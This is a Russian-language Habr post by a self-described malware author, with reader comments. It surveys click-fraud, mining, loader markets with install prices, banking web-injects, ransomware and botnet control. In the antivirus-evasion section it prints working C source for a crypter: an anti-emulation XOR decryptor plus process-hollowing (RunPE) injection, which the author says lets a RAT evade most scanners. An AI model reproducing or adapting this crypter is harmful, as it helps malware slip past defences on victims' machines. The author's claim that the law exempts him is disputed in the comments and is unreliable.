Приветствую, %хабраюзер%. Решил ненадолго оторваться от форумных войн и работы, написав на Хабр статью о вредоносном ПО. Но статья эта будет необычная, так сказать — по другую сторону баррикад. Так уж сложилось, что на жизнь зарабатываю разработкой ПО. Вредоносного.
Заранее скажу:
Я не работаю по RU и СНГ в частности, а значит, чист перед законом. Не надо меня тыкать в УК РФ, его знаю отлично и не нарушаю. Такое у нас УПК, что не считает нарушением 272/273, если не причинило вред Российской Федерации. Таким образом, я отказываюсь от ответственности от сказанного мною тут, а также не несу никакой ответственности за причиненные действия после прочтения этой статьи. И вообще — я завязал. Я добрый, хольте и лелейте.
Итак, приступим.
Начну с того, кто и зачем пишет вредоносное ПО.
Вместо вступления. Зачем же это все?
Начну со своей истории. Я начал программирование с написания вредоносного ПО, как и многие в этой сфере. Именно поэтому так часто встречаются глупые вредоносы, которые только портят, либо содержат столько ошибок, что компьютер вообще отказывается дальше работать. Побудил меня интерес к этому, когда я поймал подобную малварь. Ну, и собственное эго — начал я с таких же портящих систему вредоносов.
Позврослев и набравшись опыта, я понял, что на этом можно зарабатывать. Об этом я и хочу поговорить в первой части статьи.
Как используют вредоносное ПО?
Начнем с самого безобидного.
I) Clickfraud, мошенничество с кликами, или, как мы говорим — кликботы. Для чего это надо? Ну, представим, что вы некая рекламная фирма, и вам платят за переходы. Другими словами за траффик. И тут два пути:
1) Либо этот траффик добыть честным путем, рекламой;
2) Либо просто «попросить» вредоноса (мне не нравится, честно говоря, слово вредонос) перейти на сайт. Хорошие кликботы умеют эмулировать javascript и кликать по экрану, что очень сложно отфильтровать.
Как мы понимаем, реклама дорога, и ботнет на базе кликбота очень хорошо окупается.
Примером является P2P-ботнет на базе ZeroAccess.
II) Переходим к более агрессивному софту, майнинг. Думаю, не нужно местному сообществу объяснять, что такое майнинг. Просто скажу цифру: 9 USD/day с ~120 онлайна серверных систем на майнинге Altcoin.
Пример: ZeroAccess для майнинга Bitcoin.
Неплохо, да? Но это все неинтересно, идем дальше.
III) Загрузки. Вот мы и подошли к тому, про что обычное IT-сообщество не знает. Как обычно говорят аверы — Trojan-Downloader, а мы будем говорить по простому — лоадер. Так вот, лоадер — это такая штука, которая служит для скачивания и запуска другой малвари. Они бывают нерезидентными и резидентными. Поговорим про второе, ибо это наиболее интересно. Что обычно делает человек, использующий малварь для своих благих целей? Он ищет где бы достать лоады (загрузки) на компьютеры пользователей. И идет он к адверту (человек, который грузит софт). Адверт использует лоадер для загрузки софта этого человека на компьютеры пользователей.
Обычные расценки:
US — 600$/1к лоадов
UK — 400$/1к лоадов
Микс мира — 100$/1к лоадов
Микс Азии — 75$/1к лоадов.
Эти цены взяты у одного из таких адвертов.
Пример: Smoke Loader.
IV) Банкботы. Вот мы и подошли к кардерам, которые воруют денюшку
Начнем с банкботов.
Как работает банкбот?
Попадая на компьютер пользователя он инжектит код (внедряет в адресное пространство процесса) в браузеры, ставит хуки на апишки для работы с сетью (перехватывает функции отправки/получения данных с сети), после чего производит подмену выдачи (разговорное: веб-инжекты, инжи, инжекты). Т.е, например, заходит пользователь в онлайн банк, а у него вместо формы от банка подменяется код на форму, которая совершает автоматический перевод после ввода данных авторизации (автозаливы). Это простейший вариант; разумеется, существуют разные антифрод системы в банках и прочие способы защиты. Но и есть способы их обхода.
Суммы, получаемые кардерами, можете представить сами.
Пример: Zeus, SpyEye.
V) Криптолокеры. Наконец, мы подошли к самому низкому — криптолокерам. Данный софт шифрует все на винте и требует выкуп. Наиболее профессиональные работают следующим образом:
При старте проверяют запущены ли они в СНГ (обычно по раскладке) и, если запущены, то завершаются. Это не шутка, так и есть, примеры: Cerber Locker.
Ну да ладно, это профессионализм в целях безопасности своей же, но мы рассмотрим то, как они умудряются все пошифровать, да так, что не расшифруешь.
Для каждого файла генерируется уникальный AES-256 ключ, который шифруется глобальным публичным RSA-2048 ключем, а приватная часть удаляется из памяти и отправляется на сервер для хранения. Сделано это для того, чтобы увеличить скорость шифрования, ибо RSA — слишком медленный алгоритм, а AES-CBC шифрует довольно быстро. Чтобы расшифровать потребуются сотни лет со всей вычислительной мощности, либо приватный ключ с сервера для расшифровки ключа AES, который отправляется в автоматическом режиме при получении оплаты на уникальный для бота bitcoin-адрес. Именно так работает Cerber Locker. По данным исследователей (гуглится легко) авторы цербера заработали около $2 млн за год. На деле чуть меньше миллиона, так как распространяется этот софт засчет адвертов, которым уходит 50% (на одном из форумов висит их партнерская программа).
Вместо основной части. Как происходит управление ботнетом?
Разумеется, мы должны как-то всем этим управлять. Для этого используются чаще всего C&C-серверы (Command and control). Боты просто при старте подключаются к серверу и ждут оттуда команды. Разумеется, приходят абузы и сервер наглым образом блочат, но и от этого есть панацея. Можно использовать DGA (алгоритм генерации доменов), либо хостинг в .onion зоне (проще говоря в торе). Отличное антиабузное решение. Сейчас наблюдается интересная тенденция в использовании namecoin, он же blockchain для dns. Так что с прогрессом прятать ботнеты становится все проще, а защита только слабеет.
А как же с обходами антивирусов?
Для начала поговорим о уровнях защиты: scantime, runtime. Другими словами, во время сканирования и во время работы. К первому относится сигнатурный анализ и эвристический, а ко второму — проактивные технологии.
Все это обходится достаточно просто. Эвристика ищет подозрительные вызовы API и имена в таблице импорта, а мы можем просто использовать динамический импорт функций через самописную GetProcAddress функцию и различные техники антиэмуляции. До недавнего времени KIS не умел эмулировать последнюю ошибку API функций и его легко было пустить по ложному следу, сейчас это почему-то перестало помогать. Пока не расковырял, увы.
Для обхода сигнатурного детекта уже старых вредоносов используются крипторы. По простому, это обычные упаковщики/протекторы, но нужны для другого — расшифровать зашифрованный код в памяти и запустить его подобно загрузчику Windows. Так действуют LoadPE-крипторы.
С проактивными сложнее и обходятся исключительно разрывом шаблона поведения, нужно вести себя так, как будто ты белый и пушистый.
void Decrypt(PCHAR str, DWORD size)
{
int j = 2;
OpenProcess(0, 0, 0);
for (DWORD i = 0; i < size; i++)
{
if ((i % 1024 == 0) && (fact(j) != j))
ExitProcess(0);
str[i] ^= (xor_key - GetLastError());
str[i] -= (fact(j + 1) - fact(j) * fact(j));
}
}
void __cdecl memset_mm(void *data, char byte, DWORD size)
{
for (unsigned int i = 0; i < size; i++)
((char*)data)[i] = byte;
}
void run(LPSTR szFilePath, PVOID pFile)
{
PIMAGE_DOS_HEADER IDH;
PIMAGE_NT_HEADERS INH;
PIMAGE_SECTION_HEADER ISH;
PROCESS_INFORMATION PI;
STARTUPINFOA SI;
memset_mm(&PI, 0, sizeof(PI));
memset_mm(&SI, 0, sizeof(SI));
PCONTEXT CTX;
NtUnmapViewOfSection xNtUnmapViewOfSection;
LPVOID pImageBase;
int Count;
IDH = PIMAGE_DOS_HEADER(pFile);
if (IDH->e_magic == IMAGE_DOS_SIGNATURE)
{
INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew);
if (INH->Signature == IMAGE_NT_SIGNATURE)
{
if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
{
CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
CTX->ContextFlags = CONTEXT_FULL;
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))
{
xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
xNtUnmapViewOfSection(PI.hProcess, PVOID(INH->OptionalHeader.ImageBase));
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
if (pImageBase)
{
WriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
{
ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40));
WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
}
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX));
ResumeThread(PI.hThread);
}
}
}
}
}
VirtualFree(pFile, 0, MEM_RELEASE);
}
void Decryption()
{
PCHAR Self = (PCHAR)VirtualAlloc(0, 256, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!Self)
ExitProcess(0);
GetModuleFileNameA(0, Self, 256);
Decrypt((PCHAR)&Buf[0], size);
run(Self, Buf);
ExitProcess(0);
}
В примере в качестве ключа используется LastError от неверного вызова функции OpenProcess. Спасал раньше от KIS и других, сейчас как-то не очень. Видимо эмулятор дописали по-нормальному.
void Decrypt(PCHAR str, DWORD size)
{
int j = 2;
OpenProcess(0, 0, 0);
for (DWORD i = 0; i < size; i++)
{
if ((i % 1024 == 0) && (fact(j) != j))
ExitProcess(0);
str[i] ^= (xor_key - GetLastError());
str[i] -= (fact(j + 1) - fact(j) * fact(j));
}
}
Несмотря на такой простой алгоритм, это помогает обойти большинство антивирусов, убрав эвристические и сигнатурные детекты.
Не верите? Ок.
Давайте посмотрим на результат сканирования малвари DarkComet RAT.
А теперь накроем его криптором из под спойлера.
Результат интересный, из-за паники вокруг Zeus'а очень много ложных срабатываний из-за очень общих сигнатур на него. Разумеется, 1 детект — это ошибка скорее, а не достижение.
Вместо заключения. Как защититься?
Рекламировать особенные продукты не буду, но они есть. И этот продукт бесплатен.
1) Используйте решения класса Internet Security (Total Security);
2) Используйте фаерволлы;
3) UAC на максимальный уровень (хотя это легко обходится), пароль на админа 40 символов и сидите из под юзера;
4) NoScript плагин для браузера, измененный UserAgent под Linux и Chrome для неверной идентификации браузера.
На этом у меня все.
Комментарии (85)
azsx
20.01.2017 12:08Как происходит управление ботнетом?
Как я заметил, управляют или передают данные даже через robots.txt.
oYASo
20.01.2017 12:22+1Кстати, интересно, а кто-нибудь серьезно разработкой вирусни под никсы занимается? С одной стороны, мало у кого стоит линух (ну, Android систему я в расчет не беру, там и правда уже вирусни достаточно), с другой — это, как правило, всякие серверы или кластерные системы, завладеть которыми было бы очень интересно.
ainu
20.01.2017 12:36Ещё бы. Как правило, это уязвимость на сайте в Joomla/Wordpress, затем либо тупо PHP скрипт, либо PHP-демон, слушающий порт, либо запуск бинарника с подставным .so файлом. Последнее я видел запускался /bin/hosts. Уязвимость/вредонос называется Shellshock/MAYHEM.
В дальнейшем — чаще всего рассылка спама, реже фейковые/фишинговые страницы, порносайты, которые работают из какой-нибудь папки images, ещё реже тупо DDoS — атаки.
dezconnect
20.01.2017 15:20Навскидку можно вспомнить DDoS бота, который находил уязвимость в proftpd и запускал процесс с именем ndis (интересно это такой закос под виндовую подсистему ?) и начинал ДДоСить вполне конкретные объекты.
mickvav
20.01.2017 17:02Скоро кофеварки под линуксом обгонят гугл по совокупной вычислительной мощности.
А если серьезно — всякой дряни, ломающей ip-камеры и видеорегистраторы уже развелось весьма.
pvp
20.01.2017 12:34+7«Такое у нас УПК, что не считает нарушением 272/273, если не причинило вред Российской Федерации.»
Это, мягко говоря, заблуждение.
Scratch
20.01.2017 12:41а нет еще ботнетов, которые работают по p2p, без явных серверов управления? Такой ботнет было бы почти невозможно загасить
KonstantinSpb
20.01.2017 13:11Ну наверное какой-нить майнинг-ботнет подходит под такое описание, т.к. майнит монету для какого-то адреса bitcoin, а значит управление не нужно.
В остальных случаях, где ботнетом нужно как-то управлять, без серверов не обойтись. Роль сервера может исполнять зараженная машина, но владелец ботнета должен знать адреса таких машин, т.е. должна быть точка доступа для узнавания какая-машина в ботнете взяла роль сервера.Scratch
20.01.2017 14:03ботнет может работать по принципу торрента, kademlia/DHT, а ботам необходимо знать лишь публичный ключ хозяина, который лавинообразно может исполнять команды во всем ботнете, послав их любому из ботов
В общем, я понял, малварьщикам еще есть над чем работать. Хотя о чем-то подобном читал еще лет 15 назадKonstantinSpb
20.01.2017 14:20Знание публичного ключа(хэша и.т.п) в DHT равносильно знанию IP, поэтому безопаснее использовать DGA
FancyMalware
20.01.2017 20:43А сейчас с появлением NameCoin, эдаких записей DNS в Blockchain'е, даже DGA не нужен.
И да, DGA не скрывает айпишник, он тупо позволяет при блоке домена/сервера быстро и оперативно восстанавливать доступ к ботнету.
Вот айпишники хорошо скрывает Fastflux, но это дорого
Shamov
20.01.2017 13:16+4Честно говоря, деньги какие-то смехотворные. При всемирном охвате выручка всего $2 млн. Это выглядит как полный провал.
Dreyk
20.01.2017 13:57+7а целых 9 (девять!!!) долларов в день с кластера в 120 машин — это тоже прям мегакруто.
FancyMalware
20.01.2017 20:21Учитывая, что расходов ноль. Это мегакруто, да. И то что майнер вредоносное ПО очень сложно доказать.
Psychosynthesis
20.01.2017 20:35Да, херня какая, пару лямов. Пойду долларом прикурю…
Shamov
20.01.2017 22:26Для сравнения: Госдолг США растёт на $1.5 млн. в минуту.
FancyMalware
20.01.2017 22:33Для сравнения: чтобы вам заработать 2 млн$ вам скорее всего придется работать 2000 месяцев, по средней зарплате и ничего не тратить.
teecat
20.01.2017 13:23+1Я не работаю по RU и СНГ в частности, а значит, чист перед законом. Не надо меня тыкать в УК РФ, его знаю отлично и не нарушаю. Такое у нас УПК, что не считает нарушением 272/273, если не причинило вред Российской Федерации. Таким образом, я отказываюсь от ответственности от сказанного мною тут, а также не несу никакой ответственности за причиненные действия после прочтения этой статьи.
УК РФ, Статья 273 — Создание, распространение или использование компьютерных программ либо иной компьютерной информации, заведомо предназначенных для несанкционированного уничтожения, блокирования, модификации, копирования компьютерной информации или нейтрализации средств защиты компьютерной информации, — наказываются ограничением свободы на срок до четырех лет, либо принудительными работами на срок до четырех лет, либо лишением свободы на тот же срок со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев.
Как минимум в создании вы сознались. Никаких исключений, что не на территории РФ в законе нет. Удачи
TimsTims
20.01.2017 13:43Майор Иванов, а может не надо?
teecat
20.01.2017 13:54+3Надо, Федя, надо.
Отсутствие возможностей сбора доказательств за рубежом есть недоработка в сфере взаимодействия органов разных стран, а никак не желания их выполнить план по посадкам.
И еще. По практике судебных дел найденные на компьютере программы, которые можно отнести к хакерским и тем более вредоносным. И уж тем более исходные коды — как минимум служат доказательством возможности подозреваемого совершить преступление. И никакие честные глаза котенка не спасут
shanker
20.01.2017 16:37+1исходные коды — как минимум служат доказательством возможности подозреваемого совершить преступление
Как в том анекдоте
Мужчину судят за самогоноварение, так как нашли у него дома самогонный аппарат.
— Вы признаете, что гоните самогон?
— Нет, не гоню!
— Аппарат есть, значит гоните!
— Не гоню!
— Ваше последнее слово!
— Прошу судить меня также и за изнасилование!
— А вы еще и кого-то изнасиловали?!
— Нет, но аппарат есть!teecat
20.01.2017 16:45Если бы было так смешно
shanker
20.01.2017 16:58Это особенности отечественного судопроизводства, увы. Не так давно у одной известной персоны волосы дыбом встали, когда он зачитывал определение суда: «совершил преступление путем написания заявления в прокуратуру Липецкой области». Ссылки не даю (не хочется перехода на политику). Но гуглится легко.
Simplevolk
20.01.2017 17:22Может там имелось ввиду, что в заявлении в прокуратуру были заявлены заведомо ложные сведения? Донос, клевета?
Zoolander
20.01.2017 18:17// особенности отечественного судопроизводства
— ну а наличие детской порнографии на винте в Британии служит обоснованием для дела по педофилии
msuhanov
20.01.2017 17:57К сожалению, новость написана исключительно со слов стороны защиты. И это тот самый случай, когда в деле – одно, а в пресс-релизе – «судят за винтик от компьютера». Если прочитать эту статью, то от уровня одурманивания волосы встают дыбом.
teecat
20.01.2017 21:43К сожалению очень часто раскрутка возмущения в СМИ происходит на основе вброса одной из сторон. Спасибо за ссылку!
Shamov
20.01.2017 14:51Есть такая вещь как юрисдикция. Законы по дефолту действуют только в той стране, которая их приняла. В других странах — не действуют. Страны могут заключать между собой различные соглашения о том, чтобы это изменить. Но без таких соглашений нельзя судить человека в одной стране за то, что он сделал в другой.
teecat
20.01.2017 14:59Естественно. Но если программа создана в нашей стране, то деяние подпадает под 273 УК РФ. Очень часто на околохакерских сайтах пишут, что мол мы не работаем в РФ. Да, само объект атаки может находиться не у нас, но с нашей территории может идти «распространение» трояна — 273 УК РФ.
Наше мнение о том, что мы не подпадаем под закон не обязательно будет соответствовать мнению полиции о том или ином деянии.Shamov
20.01.2017 16:47+1А как определить, где программа была создана? Вот, допустим, вы изъяли у человека ноутбук с исходниками. Он признаёт, что разработал программу сам, но говорит, что сделал это, когда пару месяцев назад был в Могадишо. Т.е. создание произошло вне РФ. Никакого распространения с этого ноутбука не производится. Использование тоже строго за пределами. А хранение само по себе под статью не попадает.
teecat
20.01.2017 16:52> Т.е. создание произошло вне РФ
По закону не важно где было создание. главное — былоShamov
20.01.2017 17:48+1Чтобы осудить кого-то за нарушение законов страны, преступление должно быть совершено в этой стране. В противном случае нельзя было бы скрываться от тюрьмы в странах, где нет экстрадиции. Например, если вы убьете американца в США, а затем вернётесь в Россию, то осудить вас в России будет нельзя, несмотря на то, что в России убийство тоже считается преступлением. Вас можно будет лишь экстрадировать в США и осудить там. Чисто технически российские законы вы не нарушили, потому что они не действуют в США. Убивать американцев в США российским законом не запрещено. Это запрещают законы США. Но по американским законам нельзя судить в российском суде. Экстрадиция — единственное решение. А она требует специального соглашения, явным образом заключённого между странами. Понимаете, в чём трюк? Если нет, то вот другой пример. Когда в Россию приезжает какой-нибудь араб из Эмиратов, его не вяжут при выходе из самолёта и не судят за многожёнство. Хотя в России оно запрещено. Правоохранительные органы понимают, что он женился на нескольких женщинах в той стране, где это разрешено. Запрет на многожёнство в России означает лишь то, что этот араб не может жениться на ком-нибудь ещё и в России.
msuhanov
20.01.2017 18:00+1Статью 12 УК РФ прочитайте. Вот, например, часть 1:
Граждане Российской Федерации и постоянно проживающие в Российской Федерации лица без гражданства, совершившие вне пределов Российской Федерации преступление против интересов, охраняемых настоящим Кодексом, подлежат уголовной ответственности в соответствии с настоящим Кодексом, если в отношении этих лиц по данному преступлению не имеется решения суда иностранного государства.
Shamov
20.01.2017 19:01В принципе, это логично. С учётом того, что граждане РФ не подлежат выдаче иностранным государствам в принципе, должен быть какой-то способ привлекать их к ответственности за преступления вне РФ. Типа, своих преступников мы судим сами. Принцип гражданства пересиливает принцип территориальности.
Отсюда правило: Планируешь убийство в США с последующим отходом в Россию — заранее проконсультируйся с юристом.
Simplevolk
20.01.2017 17:24Человек убил другого, но будучи в Могадишо. Полиция в бессилии сжимает кулаки, но ничего не может поделать!
FancyMalware
20.01.2017 20:22Ребят, а с чего вы взяли, что я с РФ?)
teecat
20.01.2017 21:48Да не вопрос. Называйте страну, можно не свою, поднимем местные законы. Хабровцы везде есть. Но только не какую Тумба-Юмбу. Близкую к реальности. Тихо подозреваю, что по этим делам они весьма схожи
FancyMalware
20.01.2017 21:54Ну почему же не свою, можно и свою. Украина. Так то да, у нас немного по другому чем в РФ, но это не меняет сути дела.
teecat
20.01.2017 22:04Спасибо. В понедельник постараюсь узнать от наших по правоприменительной практике у вас
teecat
20.01.2017 15:00И кстати говоря. А платились ли налоги с дохода? Думаю, что нет. Так что еще и налоговая может проявить специфический интерес
dezconnect
20.01.2017 15:22С чего бы? наличку замучаются считать. А имущество всегда можно раскидать так что по всем документам ты будешь нищеброд.
teecat
20.01.2017 15:28Вспоминаем Аль-Капоне. Надо будет — посчитают. Всегда есть баланс между планом и трудозатратами на его исполнение.
Вообще, судя по новостям, сажают или ламеров, которые не умеют маскироваться (ибо быстро найти) или тех, кто слишком жаденdezconnect
20.01.2017 16:56Вам видимо никогда не приходилось жить на не облагаемые налогом суммы в течении многих лет.
jusiter
20.01.2017 20:22написал ПО то он не в другой =)
а присесть можно и за написание
Да наверное даже и за использование — запускал то тоже отсюда =)FancyMalware
20.01.2017 20:22-1Не доказать где было создано.
Ни одного запуска на РУ машине не было. Значит запускал не отсюда.
suharik
20.01.2017 15:10+3Да, исповедь уж больно скудна. Вы видели, как тщательно свои деяния Бакунин описал? Почему бы не повторить? Хотя не, условия разные. Он в то время уже сидел в Орешке.
FancyMalware
20.01.2017 20:53Ну вы и сравнили. Там все-таки объем какой, огого. И сфера у него немного, эм, другая. У меня это больше тогда будет похоже на учебник ^^
OlegAndr
20.01.2017 15:25+2Больше похоже на завуалированную рекламу чем на исповедь. -)
teecat
20.01.2017 15:32+2Ну а чего писать вирусописателю?
мы вот-вот до москвы не дошли, но почему-то кончили бои в берлине?я тут воровал-воровал деньги у простых людей, но вот меня совесть замучала!
Как-то раз в древние времена один хакер обозлился на Дядю Женю и начал писать все новые и новые вирусы. А надо сказать, что в те древние времена хакеры и антихакеры вполне могли встречаться на одних форумах. И однажды Дядю Женю это достало и он разместил на форуме письмо, что у нему постоянно пристают из МВД с просьбой помочь с планом по посадкам. Ну и мол он очень склоняется к… На следующий день на форуме было размещено письмо от имени всем известного… с заявлением о том, что в связи с женитьбой и изменением социального статуса… завязывает и теперь он белый и пушистый
Ни-ни, никакого страха перед посадкойFancyMalware
20.01.2017 20:23-1Я не ворую, совсем. Просто грузить лоадер и продавать загрузки на партнерках это не воровство, а честно заработанные деньги.
teecat
20.01.2017 21:40+1Стоять на стреме, вскрывать дверь и быть наводчиком, но при этом лично не выносить украденное — не быть членом банды?
FancyMalware
20.01.2017 20:54> хакеры и антихакеры вполне могли встречаться на одних форумах.
А сами как будто и сейчас на экспе не сидите и аналогах иже ему, лолteecat
20.01.2017 21:37Я нет. Я не вирусолог. Но по отзывам с тех пор паранойя админов таких форумов существенно выросла
FancyMalware
20.01.2017 21:55До Майора уже дослужились?
teecat
20.01.2017 22:06Не. Как и все после вуза — лейтенант. И даже присяги не принимал. Тот год особый был
ikashnitsky
20.01.2017 18:59+2И вообще — я завязал.
.
До недавнего времени KIS не умел эмулировать последнюю ошибку API функций и его легко было пустить по ложному следу, сейчас это почему-то перестало помогать. Пока не расковырял, увы.
ну-ну
AndrewFoma
20.01.2017 20:13С учётом определённых обстоятельств, известных очень узкому кругу лиц, вангую на 2017 год рост «непойманных» таких как автор. Сам думаю ввязаться в эту «тему».
rwc
20.01.2017 20:23Хоть бы разобрали «hello world malware» что блочится антивирусом, и потом зашивровали. А так зачем выкладывать пример кода где ничего не понятно…
lexab
20.01.2017 20:24Выглядит как реклама для привлечения неофитов:
Приходи на темную сторону, у нас есть печеньки, дают 600$/1к US лоадов. Безопасно для граждан РФ…
HelpOP
20.01.2017 20:24Как с MAC дела обстоят? Ни слова в статье нету.
FancyMalware
20.01.2017 20:25Плохо. Встречаются отдельные посты про малварь на мак, но они единственны. itw по сравнению с андрюшей и мастдаем очень мало.
WWWUser
20.01.2017 20:25Очень интересно. Хотелось бы прочесть мнение автора о безопасности Мак-компьютеров и macOS с точки зрения его опыта.
FancyMalware
20.01.2017 20:26MacOS это Unix по-сути. Если сидеть с урезанными правами может быть вполне безопасно. Под MacOS мало вредоносов, под IOS я вообще не видел. Вся панацея это права. LPE ( эксплойты повышения прав ) стоят очень дорого, цены намного выше чем в BugBounty и поэтому вряд ли кто-то будет использовать их для масс-малвари. Только таргетинг. И если вы не форекс биржа можете быть спокойны
landergate
20.01.2017 20:26Вот мы и подошли к тому, про что обычное IT-сообщество не знает. Как обычно говорят аверы — Trojan-Downloader
В каком смысле «не знает»?
Это же основной канал доставки. Все остальные упомянутые виды попадают в основном через них.
Кстати, а они существовали до популяризации эксплойтов в Java/Flash/Reader?FancyMalware
20.01.2017 20:27Они существовали всегда. Собсна, в этих эксплойтах обычно использовались их нерезидентные версии.
FancyMalware
20.01.2017 20:56> В каком смысле «не знает»?
Под обычном имел ввиду рядового айтишника. Который не сидит на всяких секурлистах и тредпостах. и не авер, и не малварщик.landergate
20.01.2017 21:05В общем случае да, но думаю, что многие конторы имеют бухгалтеров с банк-клиентами и браузером, где рано или поздно кто-нибудь натыкался на даунлоадер с банковским трояном-подменяльщиком под их клиент. =)
Надо быть совсем в бункере, чтобы не понимать, почему повсюду трубят о критических обновлениях браузерных расширений.FancyMalware
20.01.2017 21:08Пора бы снять розовые очки. 99.9% людей аутисты.
неужто вы правда думаете, что эти бухгалтеры и конторы понимают, что банковский трой попал им к ним через лоадер?
Так или иначе это не просто основной канал, помоему вообще один единственный. Лоадеры не используют только аутисты. Так или иначе даже в спаме криптолокерами они используются, только нерезидентные.
Psychosynthesis
Ээ… Ну… Как-то темы не больно-то широко раскрыты. Код бы подробней расписали, да чтоб с камментами. Про защиту от всего этого побольше.
Про рынок раз уж начали говорить, говорили бы подробнее — как найти, где искать… Ну и так далее. В общем какая-то очень уж поверхностная «исповедь» получилась. Собсна, а почему вообще исповедь? Где тут «грехи» ваши?
Я себя не считаю дофига специалистом, но нового тут даже для меня буквально пара абзацев.
FancyMalware
Я хотел, но боюсь тогда она не прошла бы модерацию…